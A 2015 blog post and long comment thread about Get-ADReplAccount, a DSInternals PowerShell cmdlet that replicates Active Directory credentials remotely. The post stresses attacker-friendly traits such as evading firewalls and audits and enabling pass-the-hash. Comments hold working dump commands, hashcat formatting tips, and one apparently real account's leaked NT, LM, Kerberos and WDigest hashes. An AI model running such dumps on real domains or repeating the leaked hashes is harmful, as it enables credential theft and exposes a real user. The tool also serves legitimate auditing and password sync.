Retrieving Active Directory Passwords Remotely

August 4, 2015 | Michael Grafnetter

I have finally finished work on the Get-ADReplAccount cmdlet, the newest addition to my DSInternals PowerShell Module, that can retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from remote domain controllers. This is achieved by simulating the behavior of the dcromo tool and creating a replica of Active Directory database through the MS-DRSR protocol. Furthermore, it has these properties:

  • It does not even need the Domain Admins group membership. The Replicating Directory Changes All permission is more than enough for this cmdlet to do its job.
  • It opens door to other attacks, e.g. pass-the-hash, pass-the-ticket or PAC spoofing, that can be used to seize control of the entire Active Directory forest. Long live mimikatz!
  • It cannot be effectively blocked by firewalls, because the directory replication service (the DRSGetNCChanges call to be more precise) shares the same port with other critical services, like user name resolution (exposed by the DsCrackNames call).
  • It only uses documented features of Active Directory and is not a hack per se.
  • It leaves only minimal footprint on Domain Conrollers and can be easily overlooked by security audits.

Usage example:

Sample output:

You could even dump all accounts at once, but this can cause heavy (=suspicious) replication traffic:


Tags: , ,

79 comments on “Retrieving Active Directory Passwords Remotely

  1. user says:

    hi where do you read ClearText password from? from which user attribute?

    • Michael Grafnetter says:

      Hi, the cleartext password is contained in the secret supplementalCredentials attribute, which is never sent through LDAP.

  2. user says:

    Thank you. I have One more question: Wdigest hash is MD5 of user:realm:password. Real can be empty according to MS. However in your example none of MD5 matches the AprilPa$$w0rd MD5 ;/

    • Michael Grafnetter says:

      But the first one definitely matches “April:ADATUM:Pa$$w0rd”. See the MS article, but use colons instead of commas as delimiters.

  3. B.K. says:

    Thanks for the cool module. I am trying to export hashed password from windows 2008 R2 sp1. I have installed PowerShell 5 and install DSInternal from Powershell Gallery. But I got the following error message when I tries to dump all the user information. Is there anything to check to fix this issue?

    Thanks

    PS C:\Users\Administrator> Get-ADReplAccount -All -NamingContext ‘DC=xxxx,DC=xx’ -Server infraAD
    Get-ADReplAccount : Method not found: ‘IntPtr
    System.Runtime.InteropServices.Marshal.GetFunctionPointerForDelegate(!!0)’.
    At line:1 char:1
    + Get-ADReplAccount -All -NamingContext ‘DC=xxxx,DC=xx’ -Server i …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], MissingMethodException
    + FullyQualifiedErrorId : System.MissingMethodException,DSInternals.PowerShell.Commands.GetADReplAccountCommand

    • Michael Grafnetter says:

      Thx for the report. Could you please check your version of .NET Framework? Is it 4.5.1+?

  4. B.K. says:

    Thanks Michael. It is working fine after installing .NET 4.5.1. I was not working on .NET 4.5.

    B.K.

  5. B.K. says:

    I have one more question. Can we use this PowerShell in AD LDS? I just tried this one on AD LDS. It showed the following error message.

    PS C:\DSInternals> Get-ADReplAccount -All -NamingContext ‘cn=users,dc=idg,dc=ca’ -Server IDG:50000
    Get-ADReplAccount : The RPC server is unavailable
    At line:1 char:1
    + Get-ADReplAccount -All -NamingContext ‘cn=users,dc=idg,dc=ca’ -Server I …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], Win32Exception
    + FullyQualifiedErrorId : System.ComponentModel.Win32Exception,DSInternals.PowerShell.Commands.GetADReplAccountCom
    mand

    • Michael Grafnetter says:

      Only a few of the cmdlets work with AD LDS, like Get-ADDBDomainController against adamntds.dit. Regarding replication, I have not tried it yet, as it is not enabled by default.

  6. Uwe says:

    Hello,

    Could these functions used to do a sync of passwords between two domains. I tried to do

    Get-ADReplAccount and afterwards

    et-SamAccountPasswordHash -SamAccountName teste -Domain Test -NTHash $TestUser.NTHash

    There is a format issue with the NTHash.

    Could you give me a hand?

    Uwe

    • Michael Grafnetter says:

      Yes, Uwe, password sync is one of the reasons I created this tool for. Try this:
      Set-SamAccountPasswordHash -SamAccountName teste -Domain Test -NTHash (ConvertTo-Hex $TestUser.NTHash) The Set-SamAccountPasswordHash cmdlet only accepts hex string as NTHash, not a byte array. This is a design choice I made and it has both pros and cons.

  7. John says:

    Hi Michael, I have a quick question. The ClearText field is empty. Am I doing something wrong?

    Thank you

    • Michael Grafnetter says:

      Hi John, the ClearText field only contains a value if the option “Store password using reversible encryption” is enabled on the specific account or globally.

  8. john says:

    Hi, I selected “store password using reversible encryption” but it is still empty (clear text filed)

  9. John says:

    Hi Michael,
    my bad. I didn’t pay attention. Thank you. If the AD account doesn’t use reversible encryption and then later on I just check the “Store password using reversible encryption” will it display the password then?

    • Michael Grafnetter says:

      Even if you check that option, AD still does not know the cleartext password. The cleartext password will be saved as soon that user changes his password. The same is true with unchecking that option: The cleartext password will be deleted during the next password change.

  10. John says:

    I see. Thank you Michael.

  11. Michael says:

    Hi Michael, is it possible to Write the LMHash (in Detail the password without knowing it) back to another AD (for Sync) via PS or C#?

    Thanks for the GREAT! Work.
    Greets Michael

    • Michael Grafnetter says:

      NT/LM password hash writeback is possible using my Set-SamAccountPasswordHash PS cmdlet or the DSInternals.SAM NuGet .NET library, but I would stick to using NT hashes only. I have not found out a simple way of doing kerberos key writeback.

  12. Laurent says:

    Hello Michael,

    Would it be possible to restrict NamingContext to a specific OU in order to check security on a very specific OU instead of the whole AD?

    Second question : is it possible to define which kind of SamAccountType object to retrieve? I’ve tried to define SamAccountType User in addition to the request you provided but not working.

    Any help appreciated.

    Great job by the way, love it!

    Best
    Laurent

    • Michael Grafnetter says:

      Hello Laurent, the replication protocol by itself does not support such filters. But you could use
      Where-Object DistinguishedName -like "*,OU=" in the middle of the pipeline. Or, for small OUs, you could replicate the objects one by one:
      Get-ADUser -SearchBase "OU=..." -Filter * | Select-Object -Property ObjectGuid | Get-ADReplAccount ... | Test-...

  13. Laurent says:

    Worked perfectly, thanks a lot Michael!

  14. Arsen says:

    Hello Michael, I used Win10 with .NetFramework v.4.6.1, when I run the comman as you described, I’ve got an error: “Get-ADReplAccount : The distinguished name specified for this replication operation is invalid”.

    Could you please help with this?

  15. Eduard says:

    Hi Michael,

    Using your example, in the results that I get back the LMHash is empty. Is it also because the option “Store password using reversible encryption” is not enabled on the account or globally? Or is it something else?

    Thanks!

  16. Kendall says:

    I love that Get-ADReplAccount shows the ClearText password for accounts that have reversible encryption enabled. In your sample output above it shows the field “ClearText:” and that works fine in practice for me as well. However if I just want to create a list, using the following:

    get-aduser -filter * -searchbase … | Get-ADReplAccount -Domain … -Server … | select SamAccountName, ClearText The cleartext is blank.

    How can I access the ‘cleartext’ field without having to dump the full output of Get-AdReplAccount. Ideally, my output would be:

    SamAccountName, ClearText

    Sorry to bore you with a simple formating question, but I’m stumped.

    • Michael Grafnetter says:

      Hi Kendall,

      Try to do this:


      Get-ADReplAccount ... | select SamAccountName, @{ Name = 'ClearText'; Expression = { $PSItem.SupplementalCredentials.ClearText } }

      Cheers
      Michael

  17. Kendall says:

    Worked Perfectly! You are God-like.

    Thanks,

    Kendall

  18. Todd says:

    I get the following error:

    Get-ADReplAccount : Access is denied I verified the da account can run Powershell..

    This command works fine.

    powershell Invoke-Command -ComputerName dc1 -ScriptBlock { Get-ChildItem C:\ } -credential domain1\domainadm

    What other user rights does this need? The account is a Domain Admin.

    Its a Windows 2012R2 Domain functional level. The account is in the ‘Protected Users’ Group.

  19. Todd says:

    Yes. Apparently putting a Domain Admin in the Protected Users group will block this.

    • Michael Grafnetter says:

      OK, I will look into it, Todd. It would appear that only NTLM auth works with Get-ADReplAccount, not Kerberos, but I have to verify that.

  20. Eduard says:

    Hi Michael,

    What could be the reason that LM hashes from LMHashHistory do not match the actual passwords? For instance, When I generate the LM and NTLM hashes from the current password, Hash 01 from NTHashHistory matches, but Hash 01 from LMHashHistory does not match.

    Thanks,
    Eduard

    • Michael Grafnetter says:

      Hi Eduard, it might be caused by the fact that storing LM hashes is disabled by default since Windows Server 2003. A random value is probably stored in the history, I would guess.

  21. Eduard says:

    Michael,

    Another question: what are the WDigest hashes returned by Get-ADReplAccount? That is, where would they show up on the client machine?

    Thanks!
    Eduard

    • Michael Grafnetter says:

      Hi Eduard, the WDigest hashes are used during Digest/MD5 authentication, which Windows Server supports with HTTP (IIS) and LDAP (AD). It is a deprecated authentication scheme and should not be used. AD stores these hashes for compatibility reasons.

  22. sam says:

    Excellent work ! So I guess the default domain policy of having no reversible encryption is still safe as retrieving methods on this have not yet been found?

    • Michael Grafnetter says:

      Yes, the default policy is safe. But some companies had to enable storing passwords using reversible encryption because of legacy PAP VPN authentication. Personally, I have never been in such situation.

  23. Joel says:

    Michael,

    How do I pull the LMHash and WDigest hash information out of the DSAccount object? I’m storing the object in a variable like so:

    $TesterObject = Get-ADReplAccount -SamAccountName username -Domain DOMAINNAME -Server server.domain.org I see that LMHash is a system.byte but I’m having trouble converting that back into a string.

    Similarly with the WDigest if I reference $TesterObject.SupplementalCredentials.WDigest I get a byte array/

    Thanks!

    • Michael Grafnetter says:

      Dear Joel, you can use my ConvertTo-Hex cmdlet to convert byte[] to a hexadecimal string.

  24. Peter says:

    Thanks for producing this tool – fantastic! I hope you have a minute for a couple of questions:
    1- Is NTHash the value of UnicodePwd (just not base64-encoded) ?
    2- I’m trying to generate a complete list of users from AD to have all their attributes AND their UnicodePwd. Any idea if I can ask for other LDAP attributes with ‘Get-ADReplAccount’ or how to combine the output of this with that of ‘Get-ADUser’ to generate such a list?

  25. Harpaslinh Zala says:

    Hello Michael, I am trying to retrieve password from Windows 7 Computer with AD domain Credential however I am getting below error.

    PS C:\Windows\system32> $cred =Get-credential

    cmdlet Get-Credential at command pipeline position 1
    Supply values for the following parameters:
    Credential
    PS C:\Windows\system32> Get-ADReplAccount -SamAccountName zharpal -domain magoteaux -server rajkot-dc-02
    Get-ADReplAccount : Access is denied
    At line:1 char:1
    + Get-ADReplAccount -SamAccountName zharpal -domain magoteaux -server r …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,DSInternals.PowerShell.Commands.GetADReplAccountCo
    nd

    • Michael Grafnetter says:

      Dear Harpaslin, you have apparently skipped the -Credential parameter of the Get-ADReplAccount cmdlet.

  26. Harpaslinh Zala says:

    PS C:\Windows\system32> Import-Module dsinternals
    PS C:\Windows\system32> $cred = Get-Credential Get-ADReplAccount -SamAccountName zharpal -Domain magotteaux -Server rajkot-dc-02 -Credential $cred -Protocol TCP
    Get-Credential : A positional parameter cannot be found that accepts argument ‘Get-ADReplAccount’.
    At line:1 char:9
    + $cred = Get-Credential Get-ADReplAccount -SamAccountName zharpal -Dom …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidArgument: (:) [Get-Credential], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.GetCredentialCommand I am getting as this error now.

  27. Harpaslinh Zala says:

    PS C:\Windows\system32> Import-Module dsinternals
    PS C:\Windows\system32> $cred = Get-Credential Get-ADReplAccount -SamAccountName zharpal -Domain magotteaux -Server rajkot-dc-02 -Credential $cred -Protocol TCP
    Get-Credential : A positional parameter cannot be found that accepts argument ‘Get-ADReplAccount’.
    At line:1 char:9
    + $cred = Get-Credential Get-ADReplAccount -SamAccountName zharpal -Dom …
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidArgument: (:) [Get-Credential], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.GetCredentialCommand

  28. Harpaslinh Zala says:

    I got result now but there is no clear Text so I can’t recover password now.

    PS C:\Windows\system32> Get-ADReplAccount -SamAccountName zharpal -Domain magotteaux -Server rajkot-dc-02 -Credential $c
    red -Protocol TCP

    DistinguishedName: CN=Zala Harpal,OU=Regular Accounts,OU=Mail,OU=Users,OU=Rajkot,OU=ASIA_PAC,DC=magotteaux,DC=org
    Sid: S-1-5-21-443316275-3401568197-975265098-16922
    Guid: cc9fba28-fc97-42e8-afea-271eaf8055ca
    SamAccountName: zharpal
    SamAccountType: User
    UserPrincipalName: zharpal@magotteaux.com
    PrimaryGroupId: 513
    SidHistory:
    Enabled: True
    UserAccountControl: NormalAccount
    AdminCount: False
    Deleted: False
    LastLogon:
    DisplayName: Zala Harpal
    GivenName: Zala
    Surname: Harpal
    Description: Information Technology
    ServicePrincipalName:
    SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
    SelfRelative
    Owner: S-1-5-21-443316275-3401568197-975265098-512
    NTHash: e5e9e197413856f5ca1a53df54d0d66c
    LMHash: c081b956d54a2ef28b88eb25b9c5dfca
    NTHashHistory:
    Hash 01: e5e9e197413856f5ca1a53df54d0d66c
    Hash 02: 531cfd9485f0b36e67044cff50076d17
    Hash 03: 3a95deb7a07780448aad279003bc5db0
    LMHashHistory:
    Hash 01: c081b956d54a2ef28b88eb25b9c5dfca
    Hash 02: c081b956d54a2ef2ff17365faf1ffe89
    Hash 03: c081b956d54a2ef21aa818381e4e281b
    SupplementalCredentials:
    ClearText:
    NTLMStrongHash:
    Kerberos:
    Credentials:
    DES_CBC_MD5
    Key: d9cb2338107920b3
    -140
    Key: e5e9e197413856f5ca1a53df54d0d66c
    OldCredentials:
    DES_CBC_MD5
    Key: 496854755b6e8c6d
    -140
    Key: 531cfd9485f0b36e67044cff50076d17
    Salt: MAGOTTEAUX.ORGzharpal
    Flags: 0
    KerberosNew:
    Credentials:
    AES256_CTS_HMAC_SHA1_96
    Key: 62fc62a23eb51f080f43e1f8e9b79dc1f97f40ced9fb4eed9ae1f5ac8a23687c
    Iterations: 4096
    AES128_CTS_HMAC_SHA1_96
    Key: 27a3d09ea1c1885de6afbac4c7b76896
    Iterations: 4096
    DES_CBC_MD5
    Key: d9cb2338107920b3
    Iterations: 4096
    -140
    Key: e5e9e197413856f5ca1a53df54d0d66c
    Iterations: 4096
    OldCredentials:
    AES256_CTS_HMAC_SHA1_96
    Key: 47987752a4d56dc4cd95114b0147978ba3399dc93b126f50de62b60ee99c7c3b
    Iterations: 4096
    AES128_CTS_HMAC_SHA1_96
    Key: 01a33041000d27c15d4a21d4c0740718
    Iterations: 4096
    DES_CBC_MD5
    Key: 496854755b6e8c6d
    Iterations: 4096
    -140
    Key: 531cfd9485f0b36e67044cff50076d17
    Iterations: 4096
    OlderCredentials:
    AES256_CTS_HMAC_SHA1_96
    Key: aa6caa7a47da316fc54385662c43bb6d777aefbd98714a03ad2dd5f9a10fab83
    Iterations: 4096
    AES128_CTS_HMAC_SHA1_96
    Key: ce670374a1f5dec8d3c42bc0dc031bc8
    Iterations: 4096
    DES_CBC_MD5
    Key: 9bc70e438f642f86
    Iterations: 4096
    -140
    Key: 549f8a5529710faec814f5eeb77c984a
    Iterations: 4096
    ServiceCredentials:
    Salt: MAGOTTEAUX.ORGzharpal
    DefaultIterationCount: 4096
    Flags: 0
    WDigest:
    Hash 01: e817f77d25c78915a0c67c8a6fd38a14
    Hash 02: 3c46a7a252f5d0582339e9029ebe62da
    Hash 03: c225be841b8eef0e0b245130563a1884
    Hash 04: e817f77d25c78915a0c67c8a6fd38a14
    Hash 05: 3c46a7a252f5d0582339e9029ebe62da
    Hash 06: 87c4dda7d2e2f1c61ba505af997ba741
    Hash 07: e817f77d25c78915a0c67c8a6fd38a14
    Hash 08: 7406d09efe1ccb5dab77e6d79fe54c58
    Hash 09: 7406d09efe1ccb5dab77e6d79fe54c58
    Hash 10: d6b774dba6bccd27d330a14995591f6b
    Hash 11: a17a5a4516dedf6eb5a051bcbb693d0e
    Hash 12: 7406d09efe1ccb5dab77e6d79fe54c58
    Hash 13: efbf1bda044e80cd1810b058f53d2193
    Hash 14: a17a5a4516dedf6eb5a051bcbb693d0e
    Hash 15: 6646d008bd0b39bc8ed0044c2d474c4e
    Hash 16: 6646d008bd0b39bc8ed0044c2d474c4e
    Hash 17: 237c05c30f800d51ccd4205bd102ecaa
    Hash 18: 8e52951364bdaff5caf97b2679f52579
    Hash 19: 22c089987ff1aa6db959e4864e56cffe
    Hash 20: 7b80c4fb70dbd502c236cb56cef0c99f
    Hash 21: 6944c61d63c483808c4ea31b65a0de56
    Hash 22: 6944c61d63c483808c4ea31b65a0de56
    Hash 23: cafb121216fe8be97a14d6db0fe92553
    Hash 24: db020ade5728f0b8e3232729cf3e75fc
    Hash 25: db020ade5728f0b8e3232729cf3e75fc
    Hash 26: d77bfbf442d9d7fafbbe7674ff6f9577
    Hash 27: 374de3f060fbf629d46434d34294c303
    Hash 28: f76e702a897886c1aef3676aac46f4db
    Hash 29: b53a9c8b7dbc4823447154fddb579d2f

  29. Harpaslinh Zala says:

    Dear Micheal,

    Please help to get clear text password.

    • Michael Grafnetter says:

      Dear Harpaslinh, the ClearText password is present only if you enable “Store passwords using reversible encryption” in AD. Regarding your previous examples, you apparently forgot to close the sub-command in parenthesis.

  30. maurizio says:

    Hi Michael, for some reason we are not allowed to build a trust between two forests. We must be able via LDAP to create user objects in forest/domain B by retrieving the user objects in domain/forest A. The user objects in domain B must have for some attributes the same values, like samAccount, last & first name. It is possible to “sync” the password hash from A to B so the user normally working in domain A can log on to domain B with the same samaccount and password?

    • Michael Grafnetter says:

      Yes, the Set-SamAccountPasswordHash cmdlet can do that. But only Kerberos-RC4 and NTLM(v2) authentication will work against such accounts.

  31. Jeff says:

    I keep getting an error for DSInternals.Replication.Interop.dll I have checked and the file is not locked. Any idea why?

    Get-ADReplAccount : A procedure imported by ‘DSInternals.Replication.Interop.dll’ could not be loaded.
    At line:1 char:1
    + Get-ADReplAccount -SamAccountName
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], FileLoadException
    + FullyQualifiedErrorId : System.IO.FileLoadException,DSInternals.PowerShell.Commands.GetADReplAccountCommand

    • Michael Grafnetter says:

      Jeff, could you please specify your OS, PS version and also send me the stack trace of this exception? Thx.

  32. Anonymous says:

    Hi Michael, first its great stuff 🙂 I wonder how to check which users is member of Domain Admins or local Administrators ? The user blabla is member of Domain Admins and Administrators, but the module didn’t show this correct information even if I log off and log on again, also gpupdate /force on the client didn’t help.

    ***I’ve import the new and I hope the latest module 2.21***.
    I’m trying also (just for test) to check the store password using reversible encryptions for this specific user but the module didn’t get it.
    Please help :))) The Command that I’ve run on the Client:

    Get-ADReplAccount -All -NamingContext ‘DC=test,DC=local’ -Server srv12-01

    Output:

    DistinguishedName: CN=blabla,CN=Users,DC=test,DC=local
    Sid: S-1-5-21-2984388398-6913812-1553380050-2606
    Guid: e6012490-25a8-4f2f-ae66-2cf7822afcbc
    SamAccountName: blabla
    SamAccountType: User
    UserPrincipalName: blabla@test.local
    PrimaryGroupId: 513
    SidHistory:
    Enabled: True
    UserAccountControl: PlaintextPasswordAllowed, NormalAccount, PasswordNeverExpires
    AdminCount: False
    Deleted: False
    LastLogon:
    DisplayName: blabla
    GivenName: blabla
    Surname:
    Description:
    ServicePrincipalName:
    SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent,
    DiscretionaryAclAutoInherited, SystemAclAutoInherited, SelfRelative
    Owner: S-1-5-21-2984388398-6913812-1553380050-512

    • Michael Grafnetter says:

      It might take up to 3 hours before the adminCount attribute changes from 0 to 1 after adding a user to Domain Admins. This is standard AD behavior. See this article.

  33. jesus says:

    hi Michael do you know any way to get the clear password from nthash in other words, can i get this data when active directory is 2008 o upper and “Store passwords using reversible encryption” is unchecked?

    • Michael Grafnetter says:

      Hey jesus, there is no way to get the cleartext password from the DB if it is not stored there. But you could try to attack the NTLM hash.

  34. jesus says:

    Hi Michael! I tried this but, i think since w2008 the lm hash is not stored in the A.D. do you know any way to get the lm hash in w2012?

    • Michael Grafnetter says:

      You can only extract the LM hash if it is stored in the DB in the first place. This is disabled by default on modern versions of Windows, but can be enabled by GPO (not recommended).

  35. JD says:

    Hey Michael, I’m using your code across domains but am being blocked by a firewall. What port needs to be open to run Get-ADReplAccount?

    Thanks in advance.

  36. Seb says:

    Hello Michael I see you use MS-DRSR in the DSInternals module to dump hashes from a DC.
    Can it be done locally without using MS-DRSR ? I need to dump hashes in order to sync them elsewhere, i’d like to avoid as much third party tools as possible (please take no offense), and just give the Ds-Replication-Get-Changes-All privilege to a service account and dump the hashes on the simplest way possible. Do you see a way to do so ?

    Thanks in advance

    • Michael Grafnetter says:

      You can either use MS-DRSR or password filters. There is no other online supported way of retrieving password hashes.

  37. Grant says:

    Hi Michael, we have disabled LM Hashes in the domain but there are a large number of accounts that still have them stored in AD because they haven’t updated their password. I’m using your tool to write a script to change them using a combination of Get-ADReplAccount and Set-SamAccountPasswordHash which is working quite well. I want to run this in a script and log the output fully but the problem I have is that the LMHash attribute of the users is stored in a byte array that needs to be converted to a string to log properly. This is obviously done for the Get-ADReplAccount command as it displays it in a string during the output.

    Can you point me to where that output is configured in the code source so I can use the same mechanism to output the LMhashes as strings in my script?

  38. Grant says:

    Nevermind I worked out a method using:
    “$($account.nthash | % {$_.tostring(“x”)})” -replace ” “,””

  39. noobs says:

    hi Michael,

    could you please show me how to use your ConvertTo-Hex cmdlet? current expression is :

    Get-ADReplicationaccount –all -Domain secret –server Test
    | select samaccountname, @{name = ‘NTHash’; Expression = {$PSItem.NTHash} } >……output.txt the output in the NThash column is {000,000,000,000…}

    • Michael Grafnetter says:

      @{name = ‘NTHash’; Expression = { ConvertTo-Hex $PSItem.NTHash} } Or you can use one of the Views instead, e.g.:
      Get-ADReplicationaccount –all -Domain secret –server Test | Format-Custom -View HashcatNT > output.txt

  40. Michael says:

    Seems like a really cool tool. Unfortunately for me, I get an unauthorizedaccessexception.

    Any ideas?

    + CategoryInfo : NotSpecified: (:) [Get-ADReplAccount], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,DSInternals.PowerShell.Commands.GetADReplAccountComma
    d

    • Michael Grafnetter says:

      Hi Michael, you apparently do not have the Replicating Directory Changes All permission.

  41. Aikido_Man says:

    I know this is an older post but I’m hoping you can still help.
    I’m able to pull the information I need from my server. How can I format the text to have SamAccountName NTHash.
    I’m using this command:
    Get-ADUser -SearchBase “OU=Admins,OU=company Users,DC=company,dc=com” -Filter * | Select-Object -Property ObjectGuid | Get-ADReplAccount -Server server1| select SamAccountName, @{Name = ‘NTHash’; Expression = {$PSItem.NTHash}}

    Problem is, it shows an ?array?
    UserA {247, 120, 183, 170…}
    UserB {183, 95, 226, 78…}
    UserC {103, 89, 154, 19…}

    Any Ideas How I can pull just the one hash that I can then run through hashcat.

    I’m trying to show my employer how weak our password policy is by cracking our own passwords. (maybe even his)

  42. Nico says:

    Dear Michael, I’ve looked at your source code but quite frankly this is on another level which I cannot possibly understand !
    I’d like to sync passwords via the NTLM hash between two ADs. Using the PS command this works perfectly, however I would like to write some C# code using your framework. Could you possible give some guidance on which dll’s I need to reference and the format of the commands to extract the hash on the source AD and then to set the hash in the target AD

    thanks

    • Michael Grafnetter says:

      Hi Nico, you should use the DSInternals.SAM and DSInternals.DataStore NuGet packages.

  43. NKN says:

    Hello Michael,

    I’m getting the below error when trying to load the module ,I have ver3 on my machine.

    Import-Module : The specified module ‘.\DSInternals\’ was not loaded because no valid module file was found in any
    module directory.
    At line:1 char:1
    + Import-Module .\DSInternals\
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : ResourceUnavailable: (.\DSInternals\:String) [Import-Module], FileNotFoundException
    + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand

    • Michael Grafnetter says:

      When loading the module from non-default locations, path to the DSInternals.psd1 module manifest has to be provided.

  44. Ron Naeyaert says:

    Hello

    Would this work for an ADLDS directory. If so what would the command look like to extract the hast for a user entry. The users are in ou=customers,ou=people,o=b2c.

    Thanks.

    • Michael Grafnetter says:

      Hi Ron, I have not implemented support for AD LDS into this cmdlet yet, as its schema is very flexible when compared with AD and it uses a different (and undocumented) data structure to store hashes.

Leave a Reply

Your email address will not be published.